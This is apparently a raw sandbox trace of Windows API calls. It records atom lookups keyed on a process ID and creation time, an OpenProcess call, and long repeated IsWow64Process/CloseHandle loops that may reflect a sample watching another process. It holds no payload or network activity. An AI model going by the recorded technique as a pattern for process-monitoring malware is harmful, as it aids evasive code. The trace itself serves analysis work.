	[0143.302] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.303] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0143.303] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.303] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0143.303] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0143.303] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0143.303] CloseHandle (hObject=0x2dc) returned 1
	[0143.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0143.304] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.304] CloseHandle (hObject=0x2dc) returned 1
	[0143.304] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.304] CloseHandle (hObject=0x2dc) returned 1
	[0143.304] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.304] CloseHandle (hObject=0x2dc) returned 1
	[0143.304] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.304] CloseHandle (hObject=0x2dc) returned 1
	[0143.304] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.305] CloseHandle (hObject=0x2dc) returned 1
	[0143.337] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.337] CloseHandle (hObject=0x2dc) returned 1
	[0143.337] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.337] CloseHandle (hObject=0x2dc) returned 1
	[0143.337] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.337] CloseHandle (hObject=0x2dc) returned 1
	[0143.337] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.337] CloseHandle (hObject=0x2dc) returned 1
	[0143.338] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.338] CloseHandle (hObject=0x2dc) returned 1
	[0143.338] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.338] CloseHandle (hObject=0x2dc) returned 1
	[0143.338] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.338] CloseHandle (hObject=0x2dc) returned 1
	[0143.338] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.338] CloseHandle (hObject=0x2dc) returned 1
	[0143.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.339] CloseHandle (hObject=0x2dc) returned 1
	[0143.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.339] CloseHandle (hObject=0x2dc) returned 1
	[0143.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.339] CloseHandle (hObject=0x2dc) returned 1
	[0143.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.339] CloseHandle (hObject=0x2dc) returned 1
	[0143.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.340] CloseHandle (hObject=0x2dc) returned 1
	[0143.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.340] CloseHandle (hObject=0x2dc) returned 1
	[0143.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.340] CloseHandle (hObject=0x2dc) returned 1
	[0143.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.340] CloseHandle (hObject=0x2dc) returned 1
	[0143.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.341] CloseHandle (hObject=0x2dc) returned 1
	[0143.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.341] CloseHandle (hObject=0x2dc) returned 1
	[0143.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.341] CloseHandle (hObject=0x2dc) returned 1
	[0143.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.342] CloseHandle (hObject=0x2dc) returned 1
	[0143.342] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.342] CloseHandle (hObject=0x2dc) returned 1
	[0143.342] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.342] CloseHandle (hObject=0x2dc) returned 1
	[0143.342] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.342] CloseHandle (hObject=0x2dc) returned 1
	[0143.342] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.343] CloseHandle (hObject=0x2dc) returned 1
	[0143.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.343] CloseHandle (hObject=0x2dc) returned 1
	[0143.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.343] CloseHandle (hObject=0x2dc) returned 1
	[0143.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.343] CloseHandle (hObject=0x2dc) returned 1
	[0143.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.344] CloseHandle (hObject=0x2dc) returned 1
	[0143.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.344] CloseHandle (hObject=0x2dc) returned 1
	[0143.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.344] CloseHandle (hObject=0x2dc) returned 1
	[0143.344] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.345] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0143.345] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0143.345] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0143.345] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.345] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0143.346] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.346] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0143.346] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0143.346] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0143.346] CloseHandle (hObject=0x2dc) returned 1
	[0143.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0143.346] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.346] CloseHandle (hObject=0x2dc) returned 1
	[0143.346] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.347] CloseHandle (hObject=0x2dc) returned 1
	[0143.347] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.347] CloseHandle (hObject=0x2dc) returned 1
	[0143.347] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.347] CloseHandle (hObject=0x2dc) returned 1
	[0143.347] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.347] CloseHandle (hObject=0x2dc) returned 1
	[0143.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.380] CloseHandle (hObject=0x2dc) returned 1
	[0143.380] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.380] CloseHandle (hObject=0x2dc) returned 1
	[0143.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.381] CloseHandle (hObject=0x2dc) returned 1
	[0143.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.381] CloseHandle (hObject=0x2dc) returned 1
	[0143.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.381] CloseHandle (hObject=0x2dc) returned 1
	[0143.381] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.381] CloseHandle (hObject=0x2dc) returned 1
	[0143.382] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.382] CloseHandle (hObject=0x2dc) returned 1
	[0143.382] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.382] CloseHandle (hObject=0x2dc) returned 1
	[0143.382] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.382] CloseHandle (hObject=0x2dc) returned 1
	[0143.382] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.382] CloseHandle (hObject=0x2dc) returned 1
	[0143.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.383] CloseHandle (hObject=0x2dc) returned 1
	[0143.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.383] CloseHandle (hObject=0x2dc) returned 1
	[0143.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.383] CloseHandle (hObject=0x2dc) returned 1
	[0143.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.383] CloseHandle (hObject=0x2dc) returned 1
	[0143.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.384] CloseHandle (hObject=0x2dc) returned 1
	[0143.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.384] CloseHandle (hObject=0x2dc) returned 1
	[0143.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.384] CloseHandle (hObject=0x2dc) returned 1
	[0143.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.384] CloseHandle (hObject=0x2dc) returned 1
	[0143.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.385] CloseHandle (hObject=0x2dc) returned 1
	[0143.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.385] CloseHandle (hObject=0x2dc) returned 1
	[0143.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.385] CloseHandle (hObject=0x2dc) returned 1
	[0143.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.385] CloseHandle (hObject=0x2dc) returned 1
	[0143.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.386] CloseHandle (hObject=0x2dc) returned 1
	[0143.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.386] CloseHandle (hObject=0x2dc) returned 1
	[0143.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.386] CloseHandle (hObject=0x2dc) returned 1
	[0143.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.386] CloseHandle (hObject=0x2dc) returned 1
	[0143.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.386] CloseHandle (hObject=0x2dc) returned 1
	[0143.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.387] CloseHandle (hObject=0x2dc) returned 1
	[0143.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.387] CloseHandle (hObject=0x2dc) returned 1
	[0143.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.387] CloseHandle (hObject=0x2dc) returned 1
	[0143.388] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.388] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0143.388] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0143.388] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0143.388] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.388] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0143.389] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.389] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0143.389] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0143.389] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0143.389] CloseHandle (hObject=0x2dc) returned 1
	[0143.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0143.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.389] CloseHandle (hObject=0x2dc) returned 1
	[0143.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.390] CloseHandle (hObject=0x2dc) returned 1
	[0143.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.390] CloseHandle (hObject=0x2dc) returned 1
	[0143.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.390] CloseHandle (hObject=0x2dc) returned 1
	[0143.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.390] CloseHandle (hObject=0x2dc) returned 1
	[0143.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.424] CloseHandle (hObject=0x2dc) returned 1
	[0143.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.424] CloseHandle (hObject=0x2dc) returned 1
	[0143.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.424] CloseHandle (hObject=0x2dc) returned 1
	[0143.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.424] CloseHandle (hObject=0x2dc) returned 1
	[0143.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.425] CloseHandle (hObject=0x2dc) returned 1
	[0143.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.425] CloseHandle (hObject=0x2dc) returned 1
	[0143.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.425] CloseHandle (hObject=0x2dc) returned 1
	[0143.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.426] CloseHandle (hObject=0x2dc) returned 1
	[0143.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.426] CloseHandle (hObject=0x2dc) returned 1
	[0143.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.426] CloseHandle (hObject=0x2dc) returned 1
	[0143.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.426] CloseHandle (hObject=0x2dc) returned 1
	[0143.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.427] CloseHandle (hObject=0x2dc) returned 1
	[0143.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.427] CloseHandle (hObject=0x2dc) returned 1
	[0143.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.427] CloseHandle (hObject=0x2dc) returned 1
	[0143.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.427] CloseHandle (hObject=0x2dc) returned 1
	[0143.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.428] CloseHandle (hObject=0x2dc) returned 1
	[0143.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.428] CloseHandle (hObject=0x2dc) returned 1
	[0143.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.428] CloseHandle (hObject=0x2dc) returned 1
	[0143.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.428] CloseHandle (hObject=0x2dc) returned 1
	[0143.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.429] CloseHandle (hObject=0x2dc) returned 1
	[0143.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.429] CloseHandle (hObject=0x2dc) returned 1
	[0143.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.429] CloseHandle (hObject=0x2dc) returned 1
	[0143.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.429] CloseHandle (hObject=0x2dc) returned 1
	[0143.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.430] CloseHandle (hObject=0x2dc) returned 1
	[0143.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.430] CloseHandle (hObject=0x2dc) returned 1
	[0143.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.430] CloseHandle (hObject=0x2dc) returned 1
	[0143.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.430] CloseHandle (hObject=0x2dc) returned 1
	[0143.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.431] CloseHandle (hObject=0x2dc) returned 1
	[0143.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.431] CloseHandle (hObject=0x2dc) returned 1
	[0143.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.431] CloseHandle (hObject=0x2dc) returned 1
	[0143.432] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.432] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0143.432] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0143.432] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0143.433] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.433] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0143.433] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0143.433] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0143.433] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0143.433] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0143.433] CloseHandle (hObject=0x2dc) returned 1
	[0143.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0143.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.434] CloseHandle (hObject=0x2dc) returned 1
	[0143.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.434] CloseHandle (hObject=0x2dc) returned 1
	[0143.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.434] CloseHandle (hObject=0x2dc) returned 1
	[0143.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.434] CloseHandle (hObject=0x2dc) returned 1
	[0143.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.435] CloseHandle (hObject=0x2dc) returned 1
	[0143.467] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.467] CloseHandle (hObject=0x2dc) returned 1
	[0143.467] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.467] CloseHandle (hObject=0x2dc) returned 1
	[0143.468] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.468] CloseHandle (hObject=0x2dc) returned 1
	[0143.468] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.468] CloseHandle (hObject=0x2dc) returned 1
	[0143.468] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.468] CloseHandle (hObject=0x2dc) returned 1
	[0143.468] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.468] CloseHandle (hObject=0x2dc) returned 1
	[0143.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.469] CloseHandle (hObject=0x2dc) returned 1
	[0143.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.469] CloseHandle (hObject=0x2dc) returned 1
	[0143.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.470] CloseHandle (hObject=0x2dc) returned 1
	[0143.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.470] CloseHandle (hObject=0x2dc) returned 1
	[0143.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.470] CloseHandle (hObject=0x2dc) returned 1
	[0143.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.470] CloseHandle (hObject=0x2dc) returned 1
	[0143.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.471] CloseHandle (hObject=0x2dc) returned 1
	[0143.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.471] CloseHandle (hObject=0x2dc) returned 1
	[0143.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.471] CloseHandle (hObject=0x2dc) returned 1
	[0143.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.471] CloseHandle (hObject=0x2dc) returned 1
	[0143.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.472] CloseHandle (hObject=0x2dc) returned 1
	[0143.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.472] CloseHandle (hObject=0x2dc) returned 1
	[0143.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.472] CloseHandle (hObject=0x2dc) returned 1
	[0143.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.472] CloseHandle (hObject=0x2dc) returned 1
	[0143.473] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.473] CloseHandle (hObject=0x2dc) returned 1
	[0143.473] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.473] CloseHandle (hObject=0x2dc) returned 1
	[0143.473] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.473] CloseHandle (hObject=0x2dc) returned 1
	[0143.473] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.473] CloseHandle (hObject=0x2dc) returned 1
	[0143.474] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0143.474] CloseHandle (hObject=0x2dc) returned 1
